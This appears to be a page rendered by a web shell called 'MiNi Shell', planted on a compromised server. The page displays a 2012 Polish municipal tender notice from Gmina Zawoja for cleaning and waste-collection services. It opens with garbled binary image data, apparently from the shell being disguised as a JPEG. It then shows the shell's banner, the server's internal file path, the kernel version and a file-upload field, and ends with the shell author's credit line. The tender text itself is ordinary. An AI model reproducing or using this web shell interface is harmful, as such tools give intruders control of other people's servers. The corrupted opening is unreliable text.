JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/24990-N-2012.html

<p class="kh_header"><b>Zawoja: Utrzymanie czystości na terenie Gminy Zawoja w roku 2012</b><br>
<b>Numer ogłoszenia: 24990 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zawoja , Zawoja 1307, 34-222 Zawoja, woj. małopolskie, tel. 0-33 8775-015, faks 0-33 8775-015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawoja.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości na terenie Gminy Zawoja w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Likwidacja dzikich wysypisk obejmująca całkowite uprzątnięcie terenu wraz z wywozem                           i unieszkodliwieniem zebranych odpadów, zbieranie odpadów porzuconych w miejscach na ten cel nie przeznaczonych w workach nie oznakowanych lub pozostawionych luzem.
       Uprzątnięcie terenu z odpadów odbywać się będzie na pisemne, faksem lub telefoniczne zgłoszenie,                   w ciągu 2 dni od zgłoszenia pisemnego, telefonicznego lub faxem  przez Zamawiającego. 
       Ilość odpadów do uprzątnięcia w 2012 roku szacowana jest na około 313 Mg.
2.  Całoroczne utrzymanie czystości na placu targowym w Zawoi Centrum polegające na:                             w sezonie zimowym i letnim w dzień przed handlem należy ustawić na placu handlowym pojemniki na odpady,  po zakończeniu handlu w każdą sobotę plac należy posprzątać                     z zalegających nieczystości stałych (wszelkiego rodzaju). Powyższe czynności należy wykonać do godziny 18:00.                             W/w nieczystości nie wolno gromadzić na placu targowym, należy je każdorazowo wywozić                             na składowisko lub do swojej bazy przeładunkowej. Usuwanie nieczystości z placu targowego po każdorazowym dniu handlowym /tj. sobota/ wraz z unieszkodliwieniem odpadów oraz na dodatkowe zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia. Sezon zimowy trwa od 01.01.2012 r. do 31.03.2012 r. i od 01.11.2012 r. do 31.12.2012 r. Sezon letni trwa od 01.04.2012 r. do 31.10.2012 r. 

3.   Całoroczne oczyszczanie przystanków, placów, parkingów placów gier i zabaw, miejsc wokół pojemników przeznaczonych do segregacji /tzw. IGLOO/, czyszczenie tablic informacyjnych polegające na: 
- oczyszczaniu ręcznym - zamiatanie, usunięcie wszelkich zanieczyszczeń sypkich, odpadów (śmieci, opony, gruz itd.), liści, trawy, liści i ich części, błota, ziemi, darni (z asfaltu, płytek, płyt, krawężników, obrzeży oraz ze spoin pomiędzy nimi) punktowe oczyszczanie z wiat przystankowych, koszy, słupów energetycznych naklejonych ogłoszeń, czyszczenie tablic informacyjnych; 
- bieżącym oczyszczanie - zbieranie i punktowe oczyszczanie, parkingów, placów, przystanków powodujące dokładne usunięcie również drobnych zanieczyszczeń sypkich, usunięcie darni, liści i ich części oraz zakumulowanych zanieczyszczeń sypkich, usunięcie kurzu i innych zanieczyszczeń z ławek, zerwanie z wiat przystankowych, koszy, słupów energetycznych naklejonych ogłoszeń, ustawienie przewróconych koszy
- bieżącym zbieraniu - zbieranie powodujące usunięcie zakumulowanych liści i większych śmieci (t.j. większych niż niedopałki papierosów) z placów, parkingów trawników, zerwanie                  z wiat przystankowych, koszy, słupów energetycznych naklejonych ogłoszeń, ustawienie przewróconych koszy. Usuwanie nieczystości z przystanków, placów, placów gier i zabaw, miejsc wokół pojemników przeznaczonych do segregacji /tzw. IGLOO/ parkingów wraz                        z unieszkodliwieniem nieczystości odbywać się będzie z częstotliwością okresie letnim dwa razy w tygodniu / poniedziałek i piątek/  w okresie zimowym raz w tygodniu                                      / poniedziałek/ oraz na dodatkowe zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia. Czyszczenie tablic informacyjnych odbywać się będzie raz w miesiącu /ostatni dzień miesiąca, jeżeli ostatni dzień miesiąca przypada w niedziele oczyszczanie następuje dzień wcześniej/. Sezon zimowy trwa od 01.01.2012 r. do 31.03.2012 r. i od 01.11.2012 r. do 31.12.2012 r. Sezon letni trwa od 01.04.2012 r. do 31.10.2012 r.
 -  Opróżnianie 110 koszy ulicznych o pojemności 40l wraz z unieszkodliwieniem odpadów rozstawionych przy drogach, parkingach, placach oraz na przystankach autobusowych wraz                  z utrzymaniem czystości wokół nich. Kosze stanowią własność Zamawiającego.  Opróżnianie koszy w okresie letnim dwa razy w tygodniu / poniedziałek i piątek/  w okresie zimowym raz w tygodniu / poniedziałek/ wraz z unieszkodliwieniem odpadów oraz na dodatkowe zgłoszenie telefoniczne w ciągu 24 godzin od zgłoszenia. Sezon zimowy trwa od 01.01.2012 r. do 31.03.2012 r. i od 01.11.2012 r. do 31.12.2012 r. Sezon letni trwa od 01.04.2012 r. do 31.10.2012 r.
 

4.  Przeprowadzenie dwa razy w roku /maj i wrzesień/ oraz na dodatkowe zgłoszenie                     w ciągu 14 dni 5 dniowej akcji zbiórki odpadów elektrycznych i elektronicznych                      w miejscach wskazanych przez Zamawiającego. Ilość odpadów elektrycznych                             i elektronicznych do odbioru w 2012 roku szacowana jest na około 8,65 Mg. 
       Zbieranie odpadów odbywać się będzie, po wcześniejszym podaniu do publicznej wiadomości /na tablicach ogłoszeniowych, strona internetowa, kościoły/ z drogi wojewódzkiej, dróg powiatowych i gminnych oraz rozstawione zostaną w trzech miejscach gminy tj. Zawoja Centrum , Skawica Centrum, Zawoja Widły kontenery umożliwiające przywożenie odpadów przez mieszkańców.


5.  Przeprowadzenie dwa razy w roku  - maj i wrzesień - oraz na dodatkowe zgłoszenie                      w ciągu 14 dni 5 dniowej akcji zbiórki odpadów wielkogabarytowych w miejscach wskazanych przez Zamawiającego. Ilość odpadów wielkogabarytowych do odbioru w 2012 roku szacowana jest na około 39,82 Mg.
       Zbieranie odpadów odbywać się będzie, po wcześniejszym podaniu do publicznej wiadomości /na tablicach ogłoszeniowych, strona internetowa, kościoły/ z drogi wojewódzkiej, dróg powiatowych i gminnych oraz rozstawione zostaną w trzech miejscach gminy tj. Zawoja Centrum , Skawica Centrum, Zawoja Widły kontenery umożliwiające przywożenie odpadów przez mieszkańców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 7.500,00  zł (słownie: siedem   tysięcy pięćset  złotych 00/100) zgodnie z art. 45 ust. 6 Ustawy Prawo Zamówień Publicznych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli:
a)	Wykonawca przedstawi decyzje zezwalającą na zbiórkę i transport odpadów komunalnych                  z terenu Gminy Zawoja wydaną na podstawie ustawy z dnia 27 kwietnia 2001r. o odpadach      /tj. Dz. U. Nr 39 z 2007r. poz. 251- z póź. Zm./ oraz aktualne zezwolenie na prowadzenie                  na terenie Gminy Zawoja działalności w zakresie odbierania odpadów komunalnych, wydane na podstawie ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996r. /tj. Dz. U. Nr 236 z 2005r. poz. 2008- z późn. zm./. 
b)	Udokumentuje (umowa podpisana ze składowiskiem i sortownią odpadów) gotowość przyjęcia odpadów stałych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów, spełniającego wymagania odnośnie miejsc odzysku                            i unieszkodliwiania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - to w tym okresie, wykonał należycie przynajmniej trzy usługi, której przedmiotem była zbiórka odpadów komunalnych, utrzymanie czystości i porządku na terenie gminy/miasta. Wymogiem jest, aby wykazane zamówienia były poparte dokumentami z podaniem ich wartości, nazwą  przedmiotu, dat wykonania oraz adresy Zamawiających (odbiorców) wraz z potwierdzeniem przez nich (na wykazie lub odrębnymi referencjami, lub innymi dokumentami), że usługi te zostały wykonane lub są wykonywane należycie. Referencje, protokoły odbioru lub inne dokumenty obowiązkowo muszą zawierać dane jakie występują  w kolumnach wykazu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca wykaże, że posiada co najmniej dwa samochody przystosowane do zbiórki i transportu odpadów komunalnych. Pojazdy muszą umożliwiać  bezpyłowy transport odpadów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli z oświadczenia o spełnieniu warunków art. 22 ust 1 będzie wynikało, że Wykonawca spełnia przedmiotowy warunek. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli z oświadczenia o spełnieniu warunków art. 22 ust 1 będzie wynikało, że Wykonawca spełnia przedmiotowy warunek. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Udokumentowanie (umowa podpisana ze składowiskiem i sortownią odpadów) gotowości przyjęcia odpadów stałych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów, spełniającego wymagania odnośnie miejsc odzysku     i unieszkodliwiania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Umowa może zostać zmieniona w przypadku:
a)	zmiany obowiązującej stawki VAT wynikającej z przepisu prawa.
b)	zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej: - o charakterze niezależnym od Stron, - którego Strony nie mogły przewidzieć przed zawarciem umowy, - którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, - której nie można przypisać drugiej Stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
c)	 zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron; 
d)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
e)	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi albo okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy- zmianie mogą ulec termin realizacji Umowy oraz terminy wynikające z harmonogramu 
f)	gdy zaistnieje inna, niemożliwa do przewodzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany Umowy, w szczególności terminu realizacji zamówienia.

16.2  Warunki dokonywania zmian:  
a)	zmiana może być inicjowana na wniosek Zamawiającego lub Wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian, 
b)	zmiana musi uzyskać aprobatę obu stron, 
c)	zmiana musi być zgodna z SIWZ oraz ustawą, w tym w szczególności: 
d)	zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania Wykonawców, 
e)	zmiana musi być wprowadzona w formie pisemnej pod rygorem nieważności, 
f)	zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawoja.ug.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zawoja 34-2220 Zawoja 1307, pok. 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2012 godzina 09:00, miejsce: Urząd Gminy Zawoja 34-2220 Zawoja 1307, BOK lub sekretariat (pok. 26).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com